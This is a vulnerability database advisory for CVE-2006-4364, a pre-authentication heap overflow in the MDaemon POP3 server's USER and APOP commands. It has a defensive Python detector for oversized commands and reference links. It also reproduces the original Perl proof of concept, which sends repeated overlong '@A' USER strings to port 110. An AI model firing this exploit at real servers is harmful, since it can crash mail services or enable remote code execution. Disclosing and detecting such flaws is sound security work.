MDaemon POP3 Server USER and APOP Command Buffer Overflow Vulnerability

Vulnerability ID: 1110879; Vulnerability type: Buffer overflow
Published: 2006-08-22; Updated: 2006-08-28
CVE ID: CVE-2006-4364; CNNVD-ID: CNNVD-200608-441
Affected platform: Windows; CVSS score: 5.0
|Vulnerability source
https://www.exploit-db.com/exploits/2245
https://cxsecurity.com/issue/WLB-2006080155
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200608-441
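|Vulnerability details
Alt-N MDaemon is a Windows-based mail server. The MDaemon POP3 server contains a buffer overflow vulnerability in its handling of the USER and APOP commands. Sending an overly long string containing "@" characters to the USER or APOP command triggers the vulnerability and causes a heap overflow. Exploiting the vulnerability requires sending multiple USER commands to the POP3 server. An attacker who successfully exploits it may be able to execute arbitrary code, depending on the state of the heap and the length of the string.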
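A detection sketch for the condition described above, added here as an example (it is not part of the original advisory or of MDaemon): it flags pre-auth USER/APOP lines whose mailbox argument exceeds the 40-character argument limit in RFC 1939, and raises severity when one client repeats oversized, "@"-bearing commands. The repeat threshold, the event format and the sample traffic are assumptions; tune the length limit if your deployment uses long mailbox names.

```python
import re
from collections import defaultdict

# RFC 1939 limits each POP3 command argument to 40 characters.
MAX_ARG_LEN = 40
# Hypothetical threshold: oversized USER/APOP commands per client before "high".
REPEAT_THRESHOLD = 3

CMD_RE = re.compile(rb"^(USER|APOP)[ \t]+(.*)$", re.IGNORECASE)

def inspect_command(line: bytes):
    """Return a finding dict for an oversized USER/APOP line, else None."""
    m = CMD_RE.match(line.rstrip(b"\r\n"))
    if not m:
        return None
    verb, arg = m.group(1).upper().decode(), m.group(2)
    # APOP carries "name digest"; only the mailbox name is measured here.
    name = arg.split(b" ", 1)[0] if verb == "APOP" else arg
    if len(name) <= MAX_ARG_LEN:
        return None
    return {"verb": verb, "length": len(name), "at_signs": name.count(b"@")}

def scan(events):
    """events: iterable of (client_ip, raw_line). Returns alerts keyed by client."""
    hits = defaultdict(list)
    for ip, line in events:
        finding = inspect_command(line)
        if finding:
            hits[ip].append(finding)
    alerts = {}
    for ip, findings in hits.items():
        with_at = sum(1 for f in findings if f["at_signs"])
        # The advisory notes that several USER commands are needed, so repeats matter.
        repeated = with_at and len(findings) >= REPEAT_THRESHOLD
        alerts[ip] = {"count": len(findings), "with_at": with_at,
                      "severity": "high" if repeated else "medium"}
    return alerts

# Constructed sample traffic (documentation address ranges, not real data).
SAMPLE = (
    [("198.51.100.7", b"USER " + b"A@" * 100 + b"\r\n")] * 3
    + [("203.0.113.9", b"USER alice@example.com\r\n"),
       ("203.0.113.9", b"PASS hunter2\r\n"),
       ("203.0.113.20", b"APOP " + b"x" * 64 + b" c4c9334bac560ecc979e58001b3e22fb\r\n")]
)

if __name__ == "__main__":
    for ip, alert in scan(SAMPLE).items():
        print(ip, alert)
```
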
|Exploit (PoC)
#
# PoC for Mdaemon POP3 preauth heap overflow
#
# Coded by Leon Juranic <leon.juranic@infigo.hr>
# Infigo IS <http://www.infigo.hr>
# 
#

$host = '192.168.0.105';

use IO::Socket;

for ($x = 0 ; $x < 12 ; $x++)
{
	$sock = new IO::Socket::INET (PeerAddr => $host,PeerPort => '110', Proto => 'tcp') 
	|| die "socket error\n\n";
	recv ($sock, $var, 10000,0);
	print $var;
	print $sock "USER " . "\@A" x 160 . "\r\n";
	recv ($sock, $var, 10000,0);
	print $var;
	print $sock "QUIT\r\n";
	recv ($sock, $var, 10000,0);
	print $var;
	close ($sock);
	sleep(1);
}
	$sock = new IO::Socket::INET (PeerAddr => $host,PeerPort => '110', Proto => 'tcp') 
	|| die "socket error\n\n";
	recv ($sock, $var, 10000,0);
	print $var;
	print $sock "USER " . "\@A\@A" . "B" x 326 . "\r\n";
	recv ($sock, $var, 10000,0);
	print $var;
	print $sock "USER " . "\'A" x  337 . "\r\n";
	recv ($sock, $var, 10000,0);
	print $var;
	sleep(2);

# milw0rm.com [2006-08-22]
|References

Source: SECUNIA
Name: 21595
Link: http://secunia.com/advisories/21595
Source: XF
Name: mdaemon-pop3-bo(28517)
Link: http://xforce.iss.net/xforce/xfdb/28517
Source: BID
Name: 19651
Link: http://www.securityfocus.com/bid/19651
Source: BUGTRAQ
Name: 20060822 MDaemon POP3 server remote buffer overflow (preauth)
Link: http://www.securityfocus.com/archive/1/archive/1/444015/100/0/threaded
Source: MILW0RM
Name: 2245
Link: http://www.milw0rm.com/exploits/2245
Source: MISC
Link: http://www.infigo.hr/en/in_focus/advisories/INFIGO-2006-08-04
Source: SECTRACK
Name: 1016729
Link: http://securitytracker.com/id?1016729
Source: files.altn.com
Link: http://files.altn.com/MDaemon/Release/RelNotes_en.txt
Source: OSVDB
Name: 28125
Link: http://www.osvdb.org/28125
Source: VUPEN
Name: ADV-2006-3361
Link: http://www.frsirt.com/english/advisories/2006/3361
Source: SREASON
Name: 1446
Link: http://securityreason.com/securityalert/1446
Source: MILW0RM
Name: 2245
Link: http://milw0rm.com/exploits/2245